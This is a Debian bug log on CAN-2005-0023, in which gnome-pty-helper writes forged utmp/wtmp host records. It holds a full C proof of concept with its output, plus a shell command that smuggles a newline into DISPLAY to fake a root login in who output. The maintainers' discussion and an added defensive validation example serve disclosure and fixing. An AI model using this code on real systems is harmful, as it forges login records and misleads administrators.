Debian Bug report logs - #330907
[CAN-2005-0023] /usr/sbin/gnome-pty-helper: writes arbitrary utmp records


Package: vte; Maintainer for vte is Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>;

Reported by: Paul Szabo <psz@maths.usyd.edu.au>

Date: Mon, 19 Sep 2005 23:18:01 UTC

Severity: normal

Tags: fixed-upstream, help, security, upstream

Fixed in version 1:0.28.2-6

Done: Simon McVittie <smcv@debian.org>

Bug is archived. No further changes may be made.

Forwarded to http://bugzilla.gnome.org/show_bug.cgi?id=317312



Report forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>:
Bug#329156; Package libzvt2. (full text, mbox, link).


Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
New Bug report received and forwarded. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>. (full text, mbox, link).


Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

From: Paul Szabo <psz@maths.usyd.edu.au>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Date: Tue, 20 Sep 2005 09:01:20 +1000
Package: libzvt2
Version: 1.4.2-19
Severity: critical
File: /usr/sbin/gnome-pty-helper
Justification: root security hole


gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
DISPLAY (host) settings. I am not sure if it can be tricked into erasing
existing records.

Demo output, code below.

Cheers,

Paul Szabo   psz@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia


OUTPUT:

psz@savona:~$ gnome-pty-helper-exploit xyz & sleep 1; who; ps aux | grep psz; sleep 6; who
[1] 31444
Writing utmp (who) record for DISPLAY=xyz
Running who | grep xyz
psz      pts/2        Sep 20 08:40 (xyz)
utmp (who) record will be cleaned up when we exit.
To leave it behind, kill gnome-pty-helper: kill 31446
Sleeping for 5 secs...
psz      pts/2        Sep 20 08:40 (xyz)
psz      pts/1        Sep 20 08:33 (y622.yt.maths.usyd.edu.au:0.0)
USER       PID %CPU %MEM   VSZ  RSS TTY      STAT START   TIME COMMAND
psz      31358  0.0  0.3 10340 7768 ?        S    08:14   0:00 xterm -T psz@savona -n psz@savona -sb -sl 10000 -ls
psz      31444  0.0  0.0  1484  380 pts/1    S    08:21   0:00 gnome-pty-helper-exploit xyz
psz      31446  0.0  0.0  1696  604 pts/1    S    08:21   0:00 gnome-pty-helper
psz      31454  0.0  0.0  2496  848 pts/1    R+   08:21   0:00 ps aux
[1]+  Done                    gnome-pty-helper-exploit xyz
psz      pts/1        Sep 20 08:33 (y622.yt.maths.usyd.edu.au:0.0)


CODE:

/*
    Must be compiled against (within)
	gnome-libs-1.4.2/zvt
    because it uses *.h files from there.
    Code "stolen" from subshell.c .
*/

#include <sys/types.h>

#include "subshell-includes.h"
#define ZVT_TERM_DO_UTMP_LOG 1
#define ZVT_TERM_DO_WTMP_LOG 2
#define ZVT_TERM_DO_LASTLOG  4

/* Pid of the helper SUID process */
static pid_t helper_pid;

/* The socketpair used for the protocol */
int helper_socket_protocol  [2];

/* The parallel socketpair used to transfer file descriptors */
int helper_socket_fdpassing [2];

#include <sys/socket.h>
#include <sys/uio.h>

static struct cmsghdr *cmptr;
#define CONTROLLEN  sizeof (struct cmsghdr) + sizeof (int)

static int
receive_fd (int helper_fd)
{
	struct iovec iov [1];
	struct msghdr msg;
	char buf [32];
	
	iov [0].iov_base = buf;
	iov [0].iov_len  = sizeof (buf);
	msg.msg_iov      = iov;
	msg.msg_iovlen   = 1;
	msg.msg_name     = NULL;
	msg.msg_namelen  = 0;

	if (cmptr == NULL && (cmptr = malloc (CONTROLLEN)) == NULL)
		return -1;
	msg.msg_control = (caddr_t) cmptr;
	msg.msg_controllen = CONTROLLEN;

	if (recvmsg (helper_fd, &msg, 0) <= 0)
		return -1;

	return *(int *) CMSG_DATA (cmptr);
}

static int
s_pipe (int fd [2])
{
	return socketpair (AF_UNIX, SOCK_STREAM, 0, fd);
}

static void *
get_ptys (int *master, int *slave, int update_wutmp)
{
	GnomePtyOps op;
	int result, n;
	void *tag;
	
	if (helper_pid == -1)
		return NULL;

	if (helper_pid == 0){
		if (s_pipe (helper_socket_protocol) == -1)
			return NULL;

		if (s_pipe (helper_socket_fdpassing) == -1){
			close (helper_socket_protocol [0]);
			close (helper_socket_protocol [1]);
			return NULL;
		}
		
		helper_pid = fork ();
		
		if (helper_pid == -1){
			close (helper_socket_protocol [0]);
			close (helper_socket_protocol [1]);
			close (helper_socket_fdpassing [0]);
			close (helper_socket_fdpassing [1]);
			return NULL;
		}

		if (helper_pid == 0){
			close (0);
			close (1);
			dup2 (helper_socket_protocol  [1], 0);
			dup2 (helper_socket_fdpassing [1], 1);

			/* Close aliases */
			close (helper_socket_protocol  [0]);
			close (helper_socket_protocol  [1]);
			close (helper_socket_fdpassing [0]);
			close (helper_socket_fdpassing [1]);

			execl ("/usr/sbin/gnome-pty-helper", "gnome-pty-helper", NULL);
			exit (1);
		} else {
			close (helper_socket_fdpassing [1]);
			close (helper_socket_protocol  [1]);

			/*
			 * Set the close-on-exec flag for the other
			 * descriptors, these should never propagate
			 * (otherwise gnome-pty-helper won't notice when
			 * this process is killed).
			 */
			fcntl (helper_socket_protocol [0], F_SETFD, FD_CLOEXEC);
			fcntl (helper_socket_fdpassing [0], F_SETFD, FD_CLOEXEC);
		}
	}
	op = GNOME_PTY_OPEN_NO_DB_UPDATE;
	
	if (update_wutmp & ZVT_TERM_DO_UTMP_LOG){
		if (update_wutmp & (ZVT_TERM_DO_WTMP_LOG | ZVT_TERM_DO_LASTLOG))
			op = GNOME_PTY_OPEN_PTY_LASTLOGUWTMP;
		else if (update_wutmp & ZVT_TERM_DO_WTMP_LOG)
			op = GNOME_PTY_OPEN_PTY_UWTMP;
		else if (update_wutmp & ZVT_TERM_DO_LASTLOG)
			op = GNOME_PTY_OPEN_PTY_LASTLOGUTMP;
		else
			op = GNOME_PTY_OPEN_PTY_UTMP;
	} else if (update_wutmp & ZVT_TERM_DO_WTMP_LOG) {
		if (update_wutmp & (ZVT_TERM_DO_WTMP_LOG | ZVT_TERM_DO_LASTLOG))
			op = GNOME_PTY_OPEN_PTY_LASTLOGWTMP;
		else if (update_wutmp & ZVT_TERM_DO_WTMP_LOG)
			op = GNOME_PTY_OPEN_PTY_WTMP;
	} else
		if (update_wutmp & ZVT_TERM_DO_LASTLOG)
			op = GNOME_PTY_OPEN_PTY_LASTLOG;
	
	if (write (helper_socket_protocol [0], &op, sizeof (op)) < 0)
		return NULL;
	
	n = read (helper_socket_protocol [0], &result, sizeof (result));
	if (n == -1 || n != sizeof (result)){
		helper_pid = 0;
		return NULL;
	}
	
	if (result == 0)
		return NULL;

	n = read (helper_socket_protocol [0], &tag, sizeof (tag));
	
	if (n == -1 || n != sizeof (tag)){
		helper_pid = 0;
		return NULL;
	}

	*master = receive_fd (helper_socket_fdpassing [0]);
	*slave  = receive_fd (helper_socket_fdpassing [0]);
	
	return tag;
}

int main (int argc, char* argv[])
{
	int slave_pty, master_pty;
	void* mytag;
	int log = ZVT_TERM_DO_UTMP_LOG;
	char buf[1000];

	/* The DISPLAY value to record is taken from the command line */
	if (argc < 2) {
		fprintf(stderr, "usage: %s DISPLAY\n", argv[0]);
		return 1;
	}

printf("Writing utmp (who) record for DISPLAY=%s\n", argv[1]);
setenv("DISPLAY",argv[1],1);

	/* Ask the helper for a pty; it writes the utmp record as a side effect */
	if ((mytag = get_ptys (&master_pty, &slave_pty, log)) == NULL)
		return 1;

snprintf(buf,sizeof (buf),"who | grep %s",argv[1]);
printf("Running %s\n",buf);
system(buf);
printf("utmp (who) record will be cleaned up when we exit.\n");
printf("To leave it behind, kill gnome-pty-helper: kill %d\n",helper_pid);

printf("Sleeping for 5 secs...\n");
sleep (5);
	return 0;
}



-- System Information:
Debian Release: 3.1
Architecture: i386 (i686)
Kernel: Linux 2.6.8-spm0.5
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)

Versions of packages libzvt2 depends on:
ii  gdk-imlib1             1.9.14-16.2       imaging library for use with gtk (
ii  libc6                  2.3.2.ds1-22      GNU C Library: Shared libraries an
ii  libglib1.2             1.2.10-9          The GLib library of C routines
ii  libgtk1.2              1.2.10-17         The GIMP Toolkit set of widgets fo
ii  libx11-6               4.3.0.dfsg.1-14   X Window System protocol client li
ii  xlibs                  4.3.0.dfsg.1-14   X Keyboard Extension (XKB) configu
ii  zlib1g                 1:1.2.2-4.sarge.2 compression library - runtime

-- no debconf information



Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>:
Bug#329156; Package libzvt2. (full text, mbox, link).


Acknowledgement sent to Steve Langasek <vorlon@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>. (full text, mbox, link).


Message #10 received at 329156@bugs.debian.org (full text, mbox, reply):

From: Steve Langasek <vorlon@debian.org>
To: Paul Szabo <psz@maths.usyd.edu.au>, 329156@bugs.debian.org
Subject: Re: Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Date: Mon, 19 Sep 2005 17:44:05 -0700
On Tue, Sep 20, 2005 at 09:01:20AM +1000, Paul Szabo wrote:
> Package: libzvt2
> Version: 1.4.2-19
> Severity: critical
> File: /usr/sbin/gnome-pty-helper
> Justification: root security hole

> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
> DISPLAY (host) settings. I am not sure if it can be tricked into erasing
> existing records.

Why is this filed at severity: critical?  What is the attack vector here
which permits root privilege escalation?

-- 
Steve Langasek                   Give me a lever long enough and a Free OS
Debian Developer                   to set it on, and I can move the world.
vorlon@debian.org                                   http://www.debian.org/

Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>:
Bug#329156; Package libzvt2. (full text, mbox, link).


Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>. (full text, mbox, link).


Message #15 received at 329156@bugs.debian.org (full text, mbox, reply):

From: Paul Szabo <psz@maths.usyd.edu.au>
To: 329156@bugs.debian.org, vorlon@debian.org
Subject: Re: Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Date: Tue, 20 Sep 2005 11:05:10 +1000
Steve,

>> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
>> DISPLAY (host) settings. I am not sure if it can be tricked into erasing
>> existing records.
>
> Why is this filed at severity: critical?  What is the attack vector here
> which permits root privilege escalation?

I do not know any root escalation methods. When using reportbug, those
options seemed to fit best, apologies if they were not; please change if
appropriate. (For future reference: which options should I have used
instead?)

(In fact cannot think of any attacks: cannot think of any "important" uses
of utmp/wtmp files. I use utmp in some of my own scripts, that is how I
looked at gnome-pty-helper.)

Cheers, Paul

Paul Szabo   psz@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia



Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>:
Bug#329156; Package libzvt2. (full text, mbox, link).


Acknowledgement sent to Steve Langasek <vorlon@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>. (full text, mbox, link).


Message #20 received at 329156@bugs.debian.org (full text, mbox, reply):

From: Steve Langasek <vorlon@debian.org>
To: Paul Szabo <psz@maths.usyd.edu.au>
Cc: 329156@bugs.debian.org
Subject: Re: Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Date: Mon, 19 Sep 2005 21:17:10 -0700
On Tue, Sep 20, 2005 at 11:05:10AM +1000, Paul Szabo wrote:

> >> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
> >> DISPLAY (host) settings. I am not sure if it can be tricked into erasing
> >> existing records.

> > Why is this filed at severity: critical?  What is the attack vector here
> > which permits root privilege escalation?

> I do not know any root escalation methods. When using reportbug, those
> options seemed to fit best, apologies if they were not; please change if
> appropriate. (For future reference: which options should I have used
> instead?)

Hmm... After rereading the definition at
<http://www.debian.org/Bugs/Developer#severities>, I guess there's no reason
for this bug to not fall under the description of 'critical', since the
security hole is present just from the installation of the package.

Cheers,
-- 
Steve Langasek                   Give me a lever long enough and a Free OS
Debian Developer                   to set it on, and I can move the world.
vorlon@debian.org                                   http://www.debian.org/

Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>:
Bug#329156; Package libzvt2. (full text, mbox, link).


Acknowledgement sent to Loïc Minier <lool@dooz.org>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>. (full text, mbox, link).


Message #25 received at 329156@bugs.debian.org (full text, mbox, reply):

From: Loïc Minier <lool@dooz.org>
To: Paul Szabo <psz@maths.usyd.edu.au>, 329156@bugs.debian.org
Subject: Re: Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Date: Mon, 26 Sep 2005 10:37:48 +0200
        Hi,

On Tue, Sep 20, 2005, Paul Szabo wrote:
> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
> DISPLAY (host) settings. I am not sure if it can be tricked into erasing
> existing records.

 Thanks for your report.

 Do you have a CVE ID for this security issue?

 Did you check whether libvte4 is affected?

 Do you have a fix?

   Thanks,

-- 
Loïc Minier <lool@dooz.org>



Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>:
Bug#329156; Package libzvt2. (full text, mbox, link).


Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>. (full text, mbox, link).


Message #30 received at 329156@bugs.debian.org (full text, mbox, reply):

From: Paul Szabo <psz@maths.usyd.edu.au>
To: 329156@bugs.debian.org, lool@dooz.org
Subject: Re: Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Date: Mon, 26 Sep 2005 22:12:45 +1000
Dear Loic,

>  Do you have a CVE ID for this security issue?

No. Sorry, I do not know how to get one. (Nor am sure if this is serious
enough to deserve one.)

>  Did you check whether libvte4 is affected?

No. Do not know what libvte4 is.

>  Do you have a fix?

No. (Fanciful idea: try running xhost, if it fails then surely you do not
"own" that display. Slow, maybe secure. That is what I use now.)

Cheers,

Paul Szabo   psz@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia



Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>:
Bug#329156; Package libzvt2. (full text, mbox, link).


Acknowledgement sent to Loïc Minier <lool@dooz.org>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>. (full text, mbox, link).


Message #35 received at 329156@bugs.debian.org (full text, mbox, reply):

From: Loïc Minier <lool@dooz.org>
To: Paul Szabo <psz@maths.usyd.edu.au>
Cc: 329156@bugs.debian.org
Subject: Re: Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Date: Mon, 26 Sep 2005 14:18:19 +0200
On Mon, Sep 26, 2005, Paul Szabo wrote:
> No. Sorry, I do not know how to get one. (Nor am sure if this is serious
> enough to deserve one.)

 Then I'll see whether it deserves one, and attempt to request one.

> >  Did you check whether libvte4 is affected?
> No. Do not know what libvte4 is.

 libvte4 is the GNOME 2 equivalent of libzvt2, you can grab it from:
    <http://packages.debian.org/>
 the source package for this library is "vte".

 It'd be nice if you could check whether the gnome-pty-helper shipped in
 libvte4 is affected too.  Let me know if you don't have a setup
 permitting the check, or if you lack the time.

   Bye,

-- 
Loïc Minier <lool@dooz.org>



Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>:
Bug#329156; Package libzvt2. (full text, mbox, link).


Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>. (full text, mbox, link).


Message #40 received at 329156@bugs.debian.org (full text, mbox, reply):

From: Paul Szabo <psz@maths.usyd.edu.au>
To: lool@dooz.org
Cc: 329156@bugs.debian.org
Subject: Re: Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Date: Mon, 26 Sep 2005 22:43:32 +1000
Dear Loic,

>> >  Did you check whether libvte4 is affected?
>> No. Do not know what libvte4 is.
>
> libvte4 is the GNOME 2 equivalent of libzvt2 ...
> It'd be nice if you could check whether the gnome-pty-helper shipped in
> libvte4 is affected too.  Let me know if you don't have a setup
> permitting the check, or if you lack the time.

Looking at the source

  vte-0.11.15/gnome-pty-helper/gnome-pty-helper.c

in line 682 it grabs 
	display_name = getenv ("DISPLAY");
and uses it without any sanity checks: yes, surely it is also affected.

Cheers,

Paul Szabo   psz@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia



Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>:
Bug#329156; Package libzvt2. (full text, mbox, link).


Acknowledgement sent to Matt Zimmerman <mdz@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>. (full text, mbox, link).


Message #45 received at 329156@bugs.debian.org (full text, mbox, reply):

From: Matt Zimmerman <mdz@debian.org>
To: 329156@bugs.debian.org
Subject: CVE name
Date: Mon, 26 Sep 2005 13:21:11 -0700
retitle 329156 [CAN-2005-0023] /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
thanks

Use CAN-2005-0023 for this issue.

-- 
 - mdz



Changed Bug title. Request was from Matt Zimmerman <mdz@debian.org> to control@bugs.debian.org. (full text, mbox, link).


Tags added: help Request was from Thomas Bushnell BSG <tb@becket.net> to control@bugs.debian.org. (full text, mbox, link).


Tags added: security Request was from Moritz Muehlenhoff <muehlenhoff@univention.de> to control@bugs.debian.org. (full text, mbox, link).


Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>:
Bug#329156; Package libzvt2. (full text, mbox, link).


Acknowledgement sent to Loïc Minier <lool@dooz.org>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>. (full text, mbox, link).


Message #56 received at 329156@bugs.debian.org (full text, mbox, reply):

From: Loïc Minier <lool@dooz.org>
To: Paul Szabo <psz@maths.usyd.edu.au>, 329156@bugs.debian.org, control@bugs.debian.org
Subject: Re: Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Date: Fri, 30 Sep 2005 13:57:58 +0200
tags 329156 + upstream security
forwarded 329156 http://bugzilla.gnome.org/show_bug.cgi?id=317312
clone 329156 -1
reassign -1 libvte4
thanks

[ THIS IS A RESEND, PREVIOUS MAIL WAS LOST. ]

        Hi,

On Tue, Sep 20, 2005, Paul Szabo wrote:
> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
> DISPLAY (host) settings. I am not sure if it can be tricked into erasing
> existing records.

 This vulnerability is identified as CAN-2005-0023.  The upstream
 developers of vte have been notified of the bug at:
    <http://bugzilla.gnome.org/show_bug.cgi?id=317312>

     Bye,
-- 
Loïc Minier <lool@dooz.org>



Tags added: upstream, security Request was from Loïc Minier <lool@dooz.org> to control@bugs.debian.org. (full text, mbox, link).


Noted your statement that Bug has been forwarded to http://bugzilla.gnome.org/show_bug.cgi?id=317312. Request was from Loïc Minier <lool@dooz.org> to control@bugs.debian.org. (full text, mbox, link).


Bug 329156 cloned as bug 330907. Request was from Loïc Minier <lool@dooz.org> to control@bugs.debian.org. (full text, mbox, link).


Bug reassigned from package `libzvt2' to `libvte4'. Request was from Loïc Minier <lool@dooz.org> to control@bugs.debian.org. (full text, mbox, link).


Information forwarded to debian-bugs-dist@lists.debian.org, Arnaud Patard <arnaud.patard@rtp-net.org>:
Bug#330907; Package libvte4. (full text, mbox, link).


Acknowledgement sent to Loïc Minier <lool@dooz.org>:
Extra info received and forwarded to list. Copy sent to Arnaud Patard <arnaud.patard@rtp-net.org>. (full text, mbox, link).


Message #69 received at 330907@bugs.debian.org (full text, mbox, reply):

From: Loïc Minier <lool@dooz.org>
To: 330907@bugs.debian.org, control@bugs.debian.org
Subject: Re: gnome-pty-helper foo
Date: Sat, 8 Oct 2005 20:35:21 +0200
# downgrading the clone too
severity 330907 normal
thanks

On ven, oct 07, 2005, Martin Schulze wrote:
> severity 329156 normal
> thanks dude
> 
> Loïc Minier wrote:
> >         Hi,
> > 
> > On Fri, Oct 07, 2005, Martin Schulze wrote:
> > > Could somebody explain the security implication for me?
> > 
> >  You can record in the utmp/wtmp logs something which is wrong, for
> >  example that a user is currently connected to a display while he
> >  isn't.  I'm not the one to argue with though.
> 
> Ok, so unless somebody proves us wrong we don't consider this a
> security problem.
> 
> Regards,
> 
> 	Joey
> 
> -- 
> Everybody talks about it, but nobody does anything about it!  -- Mark Twain
> 
> Please always Cc to me when replying to me on the lists.
> 

-- 
Loïc Minier <lool@dooz.org>



Severity set to `normal'. Request was from Loïc Minier <lool@dooz.org> to control@bugs.debian.org. (full text, mbox, link).


Information forwarded to debian-bugs-dist@lists.debian.org, Arnaud Patard <arnaud.patard@rtp-net.org>:
Bug#330907; Package libvte4. (full text, mbox, link).


Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to Arnaud Patard <arnaud.patard@rtp-net.org>. (full text, mbox, link).


Message #76 received at 330907@bugs.debian.org (full text, mbox, reply):

From: Paul Szabo <psz@maths.usyd.edu.au>
To: 329156@bugs.debian.org, 330907@bugs.debian.org
Subject: Re: gnome-pty-helper foo
Date: Wed, 12 Oct 2005 12:21:18 +1000
I have not yet found any uses for utmp/wtmp: maybe Joey is right and there
is no security issue. I would then suggest that to increase security,
setuid/setgid bits be removed from all utmp/wtmp maintainers.

In the meantime, I hope that conscientious sysadmins do look at who and
last output occasionally; and expect that

psz@savona:~$ exploit "$(perl -e 'print "XX)\nroot     tty01        Jan 01 02:03 (insecure.com"')" & sleep 1; who; sleep 6
[1] 22149
Writing utmp (who) record ...
utmp record will be cleaned up when we exit.
To leave it behind, kill gnome-pty-helper: kill 22152
Sleeping for 5 secs...
psz      pts/2        Oct 12 12:16 (XX)
root     tty01        Jan 01 02:03 (insecure.com)
psz      pts/1        Oct 12 11:37 (y622.yt.maths.usyd.edu.au:0.0)
[1]+  Done                    exploit "$(perl -e 'print "XX)\nroot     tty01        Jan 01 02:03 (insecure.com"')"
psz@savona:~$ 

should suitably freak them out.

Cheers,

Paul Szabo   psz@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia
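
Added example (not part of the bug log, and not code from vte or gnome-libs): the unchecked getenv ("DISPLAY") noted in message #40 and the newline-laden host shown in message #76, seen from the defending side. It sketches a syntax check a utmp-writing helper could apply before copying DISPLAY into ut_host, plus an audit check for host fields already recorded; HOST_FIELD_SIZE, the character allowlist and both function names are assumptions made for this example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed field size for this example; glibc's UT_HOSTSIZE is 256. */
#define HOST_FIELD_SIZE 256

/* ASCII-only classification, independent of the process locale. */
static int is_digit(unsigned char c) { return c >= '0' && c <= '9'; }

/* Assumed allowlist for the host part of a display name. */
static int host_char_ok(unsigned char c)
{
	return (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
	       is_digit(c) || c == '.' || c == '-' || c == '_';
}

/* Consume a run of digits starting at *pos; return how many were seen. */
static size_t skip_digits(const char *s, size_t len, size_t *pos)
{
	size_t start = *pos;
	while (*pos < len && is_digit((unsigned char) s[*pos]))
		(*pos)++;
	return *pos - start;
}

/*
 * Write side: accept only [host]:display[.screen] and copy it into a
 * zero-filled fixed-size host field. Returns 0 if accepted, -1 if rejected
 * (the field is then left empty).
 */
int display_to_host_field(const char *display, char out[HOST_FIELD_SIZE])
{
	size_t len, i = 0;

	memset(out, 0, HOST_FIELD_SIZE);
	if (display == NULL)
		return -1;
	len = strlen(display);
	if (len == 0 || len >= HOST_FIELD_SIZE)
		return -1;

	while (i < len && host_char_ok((unsigned char) display[i]))
		i++;
	if (i == len || display[i] != ':')
		return -1;
	i++;
	if (skip_digits(display, len, &i) == 0)
		return -1;
	if (i < len) {
		if (display[i] != '.')
			return -1;
		i++;
		if (skip_digits(display, len, &i) == 0 || i != len)
			return -1;
	}
	memcpy(out, display, len);
	return 0;
}

/*
 * Audit side: a host field is fixed-size and need not be NUL-terminated.
 * Returns 1 if it holds a byte that would corrupt line-oriented output
 * such as who(1): control characters, DEL, or non-ASCII.
 */
int host_field_suspicious(const char *field, size_t size)
{
	size_t i;

	for (i = 0; i < size && field[i] != '\0'; i++) {
		unsigned char c = (unsigned char) field[i];
		if (c < 0x20 || c >= 0x7f)
			return 1;
	}
	return 0;
}

int main(void)
{
	/* Constructed inputs, modelled on the values shown in the thread. */
	const char *samples[] = {
		"y622.yt.maths.usyd.edu.au:0.0",
		"xyz",
		"XX)\nroot     tty01        Jan 01 02:03 (insecure.com",
	};
	char field[HOST_FIELD_SIZE];
	size_t n;

	for (n = 0; n < sizeof samples / sizeof samples[0]; n++) {
		int rc = display_to_host_field(samples[n], field);
		printf("sample %zu: %s\n", n, rc == 0 ? "accepted" : "rejected");
	}
	return 0;
}
```

Passing the syntax check only rules out injected control characters and stray text; it does not show that the caller is actually connected to the named display.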



Information forwarded to debian-bugs-dist@lists.debian.org, gpastore@debian.org (Guilherme de S. Pastore):
Bug#330907; Package libvte4. (Tue, 30 Dec 2008 08:00:03 GMT) (full text, mbox, link).


Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to gpastore@debian.org (Guilherme de S. Pastore). (Tue, 30 Dec 2008 08:00:03 GMT) (full text, mbox, link).


Message #81 received at 330907@bugs.debian.org (full text, mbox, reply):

From: Paul Szabo <psz@maths.usyd.edu.au>
To: 329156@bugs.debian.org, 330907@bugs.debian.org
Subject: Re: gnome-pty-helper foo
Date: Tue, 30 Dec 2008 18:58:50 +1100
On 12 Oct 2005 (a long time ago!) I wrote:

> I have not yet found any uses for utmp/wtmp ...

I found a (wrongful) use for it recently, /bin/login relies on ut_line
and chowns that to the user, see

  http://bugs.debian.org/505271

That is "not this bug", as this allows us to fake ut_host only...

Cheers,

Paul Szabo   psz@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia




Bug reassigned from package `libvte4' to `vte'. Request was from Marco Rodrigues <gothicx@sapo.pt> to control@bugs.debian.org. (Sat, 21 Mar 2009 15:12:06 GMT) (full text, mbox, link).


Information forwarded to debian-bugs-dist@lists.debian.org, gpastore@debian.org (Guilherme de S. Pastore):
Bug#330907; Package vte. (Sat, 21 Mar 2009 22:09:02 GMT) (full text, mbox, link).


Acknowledgement sent to Marco Rodrigues <gothicx@sapo.pt>:
Extra info received and forwarded to list. Copy sent to gpastore@debian.org (Guilherme de S. Pastore). (Sat, 21 Mar 2009 22:09:02 GMT) (full text, mbox, link).


Message #88 received at 330907@bugs.debian.org (full text, mbox, reply):

From: Marco Rodrigues <gothicx@sapo.pt>
To: 330907@bugs.debian.org, 144904@bugs.debian.org, 276575@bugs.debian.org, 143604@bugs.debian.org, control@bugs.debian.org, vte@packages.debian.org
Subject: Reassigning bugs from libvte4 to vte
Date: Sat, 21 Mar 2009 15:11:01 GMT
reassign 330907 vte
reassign 144904 vte
reassign 276575 vte
reassign 143604 vte
thanks

The libvte4 package has been removed from Debian. We are reassigning 
its bugs to the vte package. Please have a look at them, 
and close them if they don't apply to vte anymore.

Don't hesitate to reply to this mail if you have any question.

Kind regards,
--
Marco Rodrigues




Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>:
Bug#330907; Package vte. (Thu, 04 Oct 2012 02:27:05 GMT) (full text, mbox, link).


Acknowledgement sent to paul.szabo@sydney.edu.au:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>. (Thu, 04 Oct 2012 02:27:05 GMT) (full text, mbox, link).


Message #93 received at 330907@bugs.debian.org (full text, mbox, reply):

From: paul.szabo@sydney.edu.au
To: 329156@bugs.debian.org, 330907@bugs.debian.org
Subject: utempter also allows fake host
Date: Thu, 4 Oct 2012 12:17:12 +1000
Please see
http://bugs.debian.org/689562
about utempter also allowing setting a fake host.

Cheers, Paul

Paul Szabo   psz@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia



Added tag(s) fixed-upstream. Request was from bts-link-upstream@lists.alioth.debian.org to control@bugs.debian.org. (Mon, 11 May 2015 16:54:17 GMT) (full text, mbox, link).


Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>:
